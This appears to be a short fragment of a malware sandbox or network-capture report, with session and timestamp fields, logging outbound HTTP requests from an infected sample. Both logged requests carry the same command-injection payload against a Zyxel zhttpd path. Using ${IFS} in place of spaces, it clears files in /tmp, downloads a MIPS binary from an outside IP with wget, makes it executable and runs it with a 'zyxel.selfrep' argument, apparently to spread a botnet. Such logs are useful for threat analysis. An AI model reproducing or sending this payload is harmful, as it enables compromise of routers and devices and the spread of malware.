                                                            Jan 28, 2024 10:12:35.661628008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            734192.168.2.1343668134.75.4.172443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:35.661628962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;